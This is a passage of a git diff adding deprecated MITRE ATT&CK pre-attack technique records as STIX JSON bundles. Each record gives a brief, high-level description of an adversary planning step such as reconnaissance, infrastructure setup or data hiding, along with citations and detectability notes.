Fresh Look at Collection Requirements. 
Retrieved March 2, 2017.", + "source_name": "Heffter" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "phase_name": "priority-definition-planning", + "kill_chain_name": "mitre-pre-attack" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1007", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--15ef4da5-3b93-4bb1-a39a-5396661956d3.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--15ef4da5-3b93-4bb1-a39a-5396661956d3.json new file mode 100644 index 0000000000000000000000000000000000000000..e3fb512756a6f1745249a8cb31e18d1d5f5668b4 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--15ef4da5-3b93-4bb1-a39a-5396661956d3.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--69e898b6-0b3c-44f9-ac97-d6a6d0d54ca2", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--15ef4da5-3b93-4bb1-a39a-5396661956d3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Build and configure delivery systems", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1347).\n\nDelivery systems are the infrastructure used by the adversary to host malware or other tools used during exploitation. Building and configuring delivery systems may include multiple activities such as registering domain names, renting hosting space, or configuring previously exploited environments. (Citation: APT1)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1347", + "external_id": "T1347" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "It is detectable once deployed to the public Internet, used for adversarial purposes, discovered, and reported to defenders.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "It is easy to create and burn infrastructure. 
Otherwise, blacklisting would be more successful for defenders.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1124", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--18bfa01c-9fa9-409f-91f5-4a2822609d81.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--18bfa01c-9fa9-409f-91f5-4a2822609d81.json new file mode 100644 index 0000000000000000000000000000000000000000..b11cdc44e0cbb35891f0ff79ebe8434e263aaf7f --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--18bfa01c-9fa9-409f-91f5-4a2822609d81.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--9122d69d-a21a-4859-b392-78c366583d82", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--18bfa01c-9fa9-409f-91f5-4a2822609d81", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test physical access", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1360).\n\nAn adversary can test physical access options in preparation for the actual attack. This could range from observing behaviors and noting security precautions to actually attempting access. (Citation: OCIAC Pre Incident Indicators) (Citation: NewsAgencySpy)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1360", + "external_id": "T1360" + }, + { + "source_name": "OCIAC Pre Incident Indicators", + "description": "Orange County Intelligence Assessment Center. (n.d.). Pre-Incident Indicators. Retrieved March 28, 2017." + }, + { + "source_name": "NewsAgencySpy", + "description": "The Canadian Press. (2012, August 22). Reporter says Chinese news agency asked him to spy. Retrieved March 9, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Defender often install badging, cameras, security guards or other detection techniques for physical security and monitoring.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Requires a physical presence in the space being entered and increased risk of being detected/detained (e.g., recorded on video camera)", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1137", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--194bff4f-c218-40df-bea3-1ace715de8dd.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--194bff4f-c218-40df-bea3-1ace715de8dd.json new file mode 100644 index 0000000000000000000000000000000000000000..cbf117f251f7ae3cc0b3b4cb2a71f037a1486978 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--194bff4f-c218-40df-bea3-1ace715de8dd.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--7cfff186-3c62-4f72-b3dd-81adf53bc22d", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--194bff4f-c218-40df-bea3-1ace715de8dd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify technology usage patterns", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1264).\n\nTechnology usage patterns include identifying if users work offsite, connect remotely, or other possibly less restricted/secured access techniques. (Citation: SANSRemoteAccess)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1264", + "external_id": "T1264" + }, + { + "source_name": "SANSRemoteAccess", + "description": "Jason Ragland. (2010, January 18). Remotely Accessing Sensitive Resources. Retrieved March 5, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Physical observations, OSINT for remote access instructions, and other techniques are not detectable.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Determine if users work offsite, connect remotely, or other possibly less restricted/secured access techniques.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1041", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1a295f87-af63-4d94-b130-039d6221fb11.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1a295f87-af63-4d94-b130-039d6221fb11.json new file mode 100644 index 0000000000000000000000000000000000000000..ce8163537a8aee79182abae9050dc36eb30f87e8 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1a295f87-af63-4d94-b130-039d6221fb11.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--e2a7d2e2-ccb1-48ac-8b7a-7b487a589af3", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--1a295f87-af63-4d94-b130-039d6221fb11", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire and/or use 3rd party software services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1308).\n\nA wide variety of 3rd party software services are available (e.g., [Twitter](https://twitter.com), [Dropbox](https://www.dropbox.com), [GoogleDocs](https://www.google.com/docs/about)). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012) (Citation: Nemucod Facebook)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1308", + "external_id": "T1308" + }, + { + "source_name": "LUCKYCAT2012", + "description": "Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017." + }, + { + "source_name": "Nemucod Facebook", + "description": "Bart Blaze. (2016, November 20). Nemucod downloader spreading via Facebook. Retrieved March 28, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not have visibility over account creation for 3rd party software services.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "3rd party services like these listed are freely available.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1085", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1def484d-2343-470d-8925-88f45b5f9615.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1def484d-2343-470d-8925-88f45b5f9615.json new file mode 100644 index 0000000000000000000000000000000000000000..238b476503f7897babe53fb2d263d839fedfe8ee --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1def484d-2343-470d-8925-88f45b5f9615.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--fc9bcf83-e469-430a-80f5-fd4c447b791f", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--1def484d-2343-470d-8925-88f45b5f9615", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assess vulnerability of 3rd party vendors", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1298).\n\nOnce a 3rd party vendor has been identified as being of interest it can be probed for vulnerabilities just like the main target would be. (Citation: Zetter2015Threats) (Citation: WSJTargetBreach)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1298", + "external_id": "T1298" + }, + { + "source_name": "Zetter2015Threats", + "description": "Kim Zetter. (2015, January 4). The Biggest Security Threats We\u2019ll Face in 2015. Retrieved March 5, 2017." + }, + { + "source_name": "WSJTargetBreach", + "description": "Paul Ziobro. (2014, February 6). Target Breach Began With Contractor's Electronic Billing Link. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "3rd parties would most likely not report network scans to their partners. Target network would not know that their 3rd party partners were being used as a vector.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "The difficult part is enumerating all 3rd parties. Finding major partners would not be difficult. Significantly easier with insider knowledge. 
Vulnerability scanning the 3rd party networks is trivial.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1075", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1f82ef59-b7da-4cd3-a41c-2e80f80f084f.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1f82ef59-b7da-4cd3-a41c-2e80f80f084f.json new file mode 100644 index 0000000000000000000000000000000000000000..2108b7161fc5c03234a92ff63e573cf3aa13dd7e --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1f82ef59-b7da-4cd3-a41c-2e80f80f084f.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--724a5141-de2c-42cf-9d03-46bbbb06b79d", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--1f82ef59-b7da-4cd3-a41c-2e80f80f084f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify business processes/tempo", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1280).\n\nUnderstanding an organizations business processes and tempo may allow an adversary to more effectively craft social engineering attempts or to better hide technical actions, such as those that generate network traffic. (Citation: Scasny2015) (Citation: Infosec-osint)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1280", + "external_id": "T1280" + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + }, + { + "source_name": "Infosec-osint", + "description": "InfoSec Institute. (2013, September 11). OSINT (Open-Source Intelligence). Retrieved May 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Current or previous employees may divulge information on the Internet. 
If insiders are used, the defender may have policies or tools in place to detect loss of this data or knowledge.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "In some cases, this requires some insider knowledge or specialized access to learn when critical operations occur in a corporation. For publicly traded US corporations, there is a lot of open source information about their financial reporting obligations (per SEC). Companies announce their annual shareholder meeting and their quarter phone calls with investors. Information such as this can help the adversary to glean certain aspects of the business processes and/or rhythm.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1057", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1ff8b824-5287-4583-ab6a-013bf36d4864.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1ff8b824-5287-4583-ab6a-013bf36d4864.json new file mode 100644 index 0000000000000000000000000000000000000000..4215fbf3171b31ff414cffb0d8dcdd116161e734 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--1ff8b824-5287-4583-ab6a-013bf36d4864.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--1a166e8f-7475-4c76-969c-527ed66d870d", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--1ff8b824-5287-4583-ab6a-013bf36d4864", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Data Hiding", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1320).\n\nCertain types of traffic (e.g., DNS tunneling, header inject) allow for user-defined fields. These fields can then be used to hide data. In addition to hiding data in network protocols, steganography techniques can be used to hide data in images or other file formats. Detection can be difficult unless a particular signature is already known. (Citation: BotnetsDNSC2) (Citation: HAMMERTOSS2015) (Citation: DNS-Tunnel)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1320", + "external_id": "T1320" + }, + { + "source_name": "BotnetsDNSC2", + "description": "Christian J. Dietrich, Christian Rossow, Felix C. Freiling, Herbert Bos, Maarten van Steen, Norbert Pohlmann. (2011). On Botnets that use DNS for Command and Control. Retrieved March 6, 2017." + }, + { + "source_name": "HAMMERTOSS2015", + "description": "FireEye. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved March 6, 2017." + }, + { + "source_name": "DNS-Tunnel", + "description": "Alexey Shulmi and Sergey Yunakovsky. (2017, April 28). Use of DNS Tunneling for C&C Communications. Retrieved May 9, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Unless defender is dissecting protocols or performing network signature analysis on any protocol deviations/patterns, this technique is largely undetected.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "This technique requires a more advanced protocol understanding and testing to insert covert communication into legitimate protocol fields.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1097", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2011ffeb-8003-41ef-b962-9d1cbfa35e6d.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2011ffeb-8003-41ef-b962-9d1cbfa35e6d.json new file mode 100644 index 0000000000000000000000000000000000000000..76e1644bbecbebc86053eb9ccfb3312358f1a124 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2011ffeb-8003-41ef-b962-9d1cbfa35e6d.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--07554274-64d0-4998-b11d-d2ceb17dcd2e", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--2011ffeb-8003-41ef-b962-9d1cbfa35e6d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine physical locations", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1282).\n\nPhysical locality information may be used by an adversary to shape social engineering attempts (language, culture, events, weather, etc.) or to plan for physical actions such as dumpster diving or attempting to access a facility. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1282", + "external_id": "T1282" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary searches publicly available sources that list physical locations that cannot be monitored by a defender or are not necessarily monitored (e.g., all IP addresses touching their public web space listing physical locations).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Most corporations now list their locations on public facing websites. 
Some challenge still exists to find covert or sensitive locations.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1059", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c.json new file mode 100644 index 0000000000000000000000000000000000000000..904352d73f2131e149b0b14670f1120ac4d69876 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--62b9c528-6105-4828-8405-71323614580b", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dynamic DNS", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1311).\n\nDynamic DNS is a method of automatically updating a name in the DNS system. Providers offer this rapid reconfiguration of IPs to hostnames as a service. (Citation: DellMirage2012)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1311", + "external_id": "T1311" + }, + { + "source_name": "DellMirage2012", + "description": "DELL SECUREWORKS COUNTER THREAT UNIT THREAT INTELLIGENCE. (2012, September 18). The Mirage Campaign. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not know at first use what is valid or hostile traffic without more context. It is possible, however, for defenders to see if the PTR record for an address is hosted by a known DDNS provider. 
There is potential to assign some level of risk based on this.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Flexible and re-configurable command and control servers, along with deniable ownership and reduced cost of ownership.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1088", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2141aea0-cf38-49aa-9e51-ac34092bc30a.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2141aea0-cf38-49aa-9e51-ac34092bc30a.json new file mode 100644 index 0000000000000000000000000000000000000000..769a8f939d42ce0f36566cea743176b84b58e103 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2141aea0-cf38-49aa-9e51-ac34092bc30a.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--69f382be-308d-4d26-b021-e1cd6c7cacd2", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--2141aea0-cf38-49aa-9e51-ac34092bc30a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Procure required equipment and software", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1335).\n\nAn adversary will require some physical hardware and software. They may only need a lightweight set-up if most of their activities will take place using on-line infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems. (Citation: NYTStuxnet)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1335", + "external_id": "T1335" + }, + { + "source_name": "NYTStuxnet", + "description": "William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. 
Retrieved March 1, 2017.", + "url": "https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1112", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Ease and availability of current hardware and software, mobile phones (cash and go phones), and additional online technology simplifies adversary process to achieve this technique (and possibly without traceability). The adversary has control of the infrastructure and will likely be able to add/remove tools to infrastructure, whether acquired via hacking or standard computer acquisition (e.g., [https://aws.amazon.com AWS], VPS).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Outside of highly specific or rare HW, nearly impossible to detect and track.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--23ecb7e0-0340-43d9-80a5-8971fe866ddf.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--23ecb7e0-0340-43d9-80a5-8971fe866ddf.json new file mode 100644 index 0000000000000000000000000000000000000000..c69f47607c472b1b682b273b45fb09657d64fcda --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--23ecb7e0-0340-43d9-80a5-8971fe866ddf.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--5ef75803-6ff8-4ac8-ac08-3c3d5180123e", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--23ecb7e0-0340-43d9-80a5-8971fe866ddf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine domain and IP address space", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1250).\n\nDomain Names are the human readable names used to represent one or more IP addresses. IP addresses are the unique identifier of computing devices on a network. Both pieces of information are valuable to an adversary who is looking to understand the structure of a network. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1250", + "external_id": "T1250" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Public or easily obtainable information by design.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "AS and IANA data are easily available, existing research tools.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1027", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--248cbfdd-fec4-451b-b2a9-e46d4b268e30.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--248cbfdd-fec4-451b-b2a9-e46d4b268e30.json new file mode 100644 index 0000000000000000000000000000000000000000..4cd3ab83aafea440a9e8e8477f55ed0845ce5620 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--248cbfdd-fec4-451b-b2a9-e46d4b268e30.json 
